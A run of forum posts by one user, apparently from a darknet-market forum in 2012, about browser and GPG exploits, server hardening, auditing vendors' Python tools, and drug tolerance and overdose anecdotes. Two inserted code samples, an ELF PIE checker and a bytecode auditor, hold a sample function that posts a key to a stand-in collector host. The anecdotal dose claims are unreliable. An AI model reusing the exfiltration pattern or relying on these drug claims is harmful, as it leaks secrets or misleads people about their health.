Messages - kmfkewm

2176
Quote
What are those serverside pieces of code that find their way into the client's main memory/HD? That's a bolt from the blue for pine. I thought something like that would essentially be illegal across the board because it could compromise the website itself if a hacker only needed to examine his RAM to extract data about the backend. I guess I took 'serverside' and 'clientside' as statements of fact rather than more general ideas with some caveats/exceptions attached. It's difficult to question literally everything you read or you never get anywhere.

The PHP code stays on the server but the HTML files it generates do not. The stylesheets it generated may not. The images on it do not, etc. If you don't have JavaScript disabled, JavaScript can run on your machine as well. A lot of remote code execution bugs with Firefox are linked to font rendering, actually. There have been vulnerabilities in the Firefox HTML engine as well; I am not certain but I believe they could be carried out with HTML only. Actually, a little research has made me certain: here is an example of a Firefox vulnerability that could be exploited with a specially crafted href: http://www.cvedetails.com/cve/CVE-2007-2671/ . It doesn't mention the possibility of remote code execution, only a crash and denial of service, but where there is crashing, remote code execution is generally possible. So you are correct that the PHP code for SR does not run in your memory, but things from SR are indeed present in your computer's memory and in some cases on its HD.


Quote
HTML can actually be exploited? Ok, now you're scaring me. I take it you mean that if a scripting language was allowed, then it could engineer something like a buffer overflow with the browser's HTML engine or something like that? Because if a bunch of <br> and <span> statements in any order, pattern or magnitude can be used to exploit then you can count me among the terrified. I've heard of images having exploits, but that it was rare, but not about GPG sigs or stuff like that.

Firefox's HTML engine can be exploited with HTML. Here is a link about GPG being remotely exploited during signature verification; although it is not the example I was thinking of, it is the first thing I found about GPG exploits while searching for it: http://forums.gentoo.org/viewtopic-p-6848828.html and here is another example of specially crafted signed / encrypted data being used to pwn people who process it through GPG: http://lwn.net/Articles/212909/

2177
Just looked it up, seems Ubuntu does have Apache compiled as position independent since version 9.04, so that is a big plus. Hopefully SR server has a 64-bit processor to take advantage of that.

2178
Quote
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.

Well, you actually may very well download parts of it to your hard drive depending on your exact browser configuration, but you certainly download it and have it in memory. It can still be used to exploit you, but it requires a lot more skill on the part of the attacker to pwn you through a website than it does to pwn you by getting you to run their malicious program, especially if it is not severely restricted in what it is allowed to do on your system (such as JavaScript is). In short, going to a pwnt website is probably a lot safer than running malicious.exe (or even .py) (even though it doesn't necessarily have to be, but I think for the sake of pragmatism we can assume that most people here are not using air gaps or properly implemented process isolation).

Quote
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage with just those components cannot contain an exploit for you to worry about because it's not even programming code.

It definitely does touch your machine and can be used to exploit vulnerabilities in your system (likely but not necessarily browser) to take over your system. Well, strictly speaking the PHP code doesn't, but what it produces does. Even HTML can be used to pwn people, if there is a remote code execution vulnerability in the browser's HTML engine (as has happened before. In fact even images have had exploits embedded in them for pwning image viewing software that views them....even GPG signatures have had exploits contained in them). Unfortunately I do not know the finer details of how such advanced hacking is carried out, but it is possible. These attacks are extremely rare and vulnerabilities like this are few and far between, although it was not that long ago I remember reading about an HTML based exploit against Firefox.

Quote
And if SR indeed did offer up its server side code as open source, LE would surely be delighted to examine it for weaknesses.

And they would probably find some. SR should have his code professionally audited too, he is clearly not a security expert. He does know what Linux is and what Tor and GPG and bitcoins are though, so he has probably done a less than horrible job at configuring SR, although I wonder how much PHP experience he has and how much experience he has hardening servers. Someone with no experience hardening servers is extremely likely to make a much easier target than someone who has extensive knowledge on hardening servers, although the OS used will add some level of 'built in' security. Ubuntu is definitely not the best choice he could have gone with; for someone with his apparent level of server hardening I would certainly have suggested that he went with OpenBSD, as it is hardened by default and contains preconfigured security solutions with less focus on requiring the person running the server to know how to do a lot of different specialized configurations to lock things down. I also am not sure but I wonder if Apache is default compiled as a position independent executable on Ubuntu....or if he would know how to manually specify it during compile time if it is not, or if he knows what a position independent executable is and how compiling Apache as one would benefit security or the hardware requirements to take full advantage of it etc.....
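
The two posts above ask whether Apache is built as a position independent executable and whether the host is 64-bit. As an added example (not code from this thread), one way to read both facts from a binary's ELF header; the PT_INTERP test used to tell a PIE from a shared library is a common heuristic, and the sample headers are constructed for the demonstration.

```python
import struct
import sys

ET_EXEC, ET_DYN = 2, 3   # e_type values from the ELF specification
PT_LOAD, PT_INTERP = 1, 3  # program header types

def build_elf64(e_type, with_interp):
    """Constructed sample: minimal little-endian ELF64 header plus one program header."""
    ident = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9)  # class=64-bit, data=LSB
    header = ident + struct.pack("<HHIQQQIHHHHHH",
                                 e_type, 62, 1, 0, 64, 0, 0, 64, 56, 1, 0, 0, 0)
    p_type = PT_INTERP if with_interp else PT_LOAD
    return header + struct.pack("<IIQQQQQQ", p_type, 4, 0, 0, 0, 0, 0, 1)

def classify(data):
    """Return (word size in bits, kind) for a little-endian ELF image."""
    if data[:4] != b"\x7fELF" or data[5] != 1:
        raise ValueError("not a little-endian ELF file")
    bits = {1: 32, 2: 64}[data[4]]
    e_type, = struct.unpack_from("<H", data, 16)
    if bits == 64:
        phoff, = struct.unpack_from("<Q", data, 32)
        phentsize, phnum = struct.unpack_from("<HH", data, 54)
    else:
        phoff, = struct.unpack_from("<I", data, 28)
        phentsize, phnum = struct.unpack_from("<HH", data, 42)
    p_types = [struct.unpack_from("<I", data, phoff + i * phentsize)[0]
               for i in range(phnum)]
    if e_type == ET_EXEC:
        # Linked for one fixed load address: the main image cannot be randomized.
        return bits, "fixed-address executable"
    if e_type == ET_DYN:
        # Heuristic: an ET_DYN image that requests a loader is a PIE.
        return bits, "PIE" if PT_INTERP in p_types else "shared object"
    return bits, "other"

if __name__ == "__main__":
    if len(sys.argv) > 1:          # e.g. the path of the web server binary
        with open(sys.argv[1], "rb") as fh:
            print(classify(fh.read()))
    else:
        print(classify(build_elf64(ET_DYN, True)))
```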

2179
Quote
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programmers could be caught out if they are not trained to analyze potentially malicious code. Code analysis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.

It is much harder to hide something in a python script than in say C or C++ source code.

2180
Quote
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated. Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC. I'm basing this opinion on my experience with PGP Club and GPG instruction in other threads and via PMs.

And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.

Quote
There's nothing in the GPL which prevents selling the code under that license.  In fact, here's the part of the FAQ which relates to it:

Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.

Quote
I can understand that concern too and I share it.  There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.

It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.

Quote
It's possible to compile Python code as a Windows executable, but that's not what this is.  I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb.  Ridiculous.  I'd rather just install Python, if it's not already installed, and run the code.

I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straightforward. I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.

It is possible to make a Windows executable out of a Ruby script as well, but it contains the actual script and a Ruby interpreter inside of it ;). I have no real idea, but I wouldn't be surprised if it is the same thing with Python. Yeah, I also think it is pretty straightforward to reverse engineer bytecode, but I was trying to imagine what a closed source Python program would look like. I don't know Python but I do know Ruby, and even the .exe's contain the source code in them; they are a cheap gimmick that packages an interpreter and the script into a single executable file.
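
An added example, not code from any poster in this thread, showing what an auditor can recover from a Python program shipped as bytecode only, the case discussed above. The sample script, its `report` function and the `collector.example.invalid` URL are constructed for illustration.

```python
import marshal
import types

# Constructed sample standing in for a tool distributed without its source.
SAMPLE_SOURCE = '''
import urllib.request

def report(key):
    url = "http://collector.example.invalid/upload"
    return urllib.request.urlopen(url, data=key.encode())
'''

def to_bytecode_blob(source, name="tool.py"):
    """Compile source and serialise the code object, as the body of a .pyc is."""
    return marshal.dumps(compile(source, name, "exec"))

def audit_blob(blob):
    """Recover referenced names and string constants without running the code.

    marshal.loads only rebuilds the code object, it does not execute it, but
    the marshal documentation warns against untrusted input, so do this in a
    disposable VM and with the same Python version that produced the blob.
    """
    names, strings = set(), set()
    stack = [marshal.loads(blob)]
    while stack:
        code = stack.pop()
        names.update(code.co_names)          # imports, globals, attributes
        for const in code.co_consts:
            if isinstance(const, types.CodeType):
                stack.append(const)          # nested function or class body
            elif isinstance(const, str):
                strings.add(const)           # URLs, paths, commands, ...
    return names, strings

if __name__ == "__main__":
    found_names, found_strings = audit_blob(to_bytecode_blob(SAMPLE_SOURCE))
    print(sorted(found_names))
    print(sorted(found_strings))
```

The standard library's `dis.dis()` accepts the same loaded code object and prints the full instruction listing when the names and strings alone are not enough.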

2181
Off topic / Re: My rapping career.. opinions please.
« on: September 06, 2012, 02:09 am »
You must be MC crap ya bitch cuz your raps are whacker than shit, plus trashy as empty packages.

2182
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not.  ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre.  :)

I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only. If a vendor knows enough Python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it. I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pine's concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a Python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when Python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).

My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.

2183
Goddamn this thread got huge

Yeah but the bigger it gets the more we all laugh. :))

that's what she said to you

2184
Goddamn this thread got huge

that's what she said

2185
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:

A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P

Failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.

2186
Is it even possible to make Python programs closed source? What is it, bytecode?

2187
Drug safety / Re: Ketamine Tolerance
« on: September 04, 2012, 07:58 pm »
I can guarantee you that ketamine tolerance goes down over time, if it didn't I would need to sniff a gram at a time. After going on monster binges I get to the point that I need to sniff lines as long and thick as a pencil, after not touching it for months I am back to before.

2188
Drug safety / Re: Ketamine Tolerance
« on: September 04, 2012, 04:06 pm »
k tolerance is completely reversible in my experience, just don't touch it for a month.

2189
Drug safety / Re: Taking LSD "Too Far"
« on: September 04, 2012, 03:51 pm »
Not people I know but documented cases.

2190
Drug safety / Re: Taking LSD "Too Far"
« on: September 04, 2012, 03:10 pm »
There were a couple people in I believe the 60's that did lines of it, thinking it was cocaine....so if they only did a .1g line of it that's like taking 100,000 tabs of acid with 100mcg on them each....they did end up going to the hospital, but I don't think there were any really lasting effects....I could be wrong though, it was a long time ago that I read that article

Some have died from sniffing massive overdoses of LSD crystal, others have lived but got a laundry list of nasty effects including bleeding through their skin. Of course these are doses equal to thousands of hits.
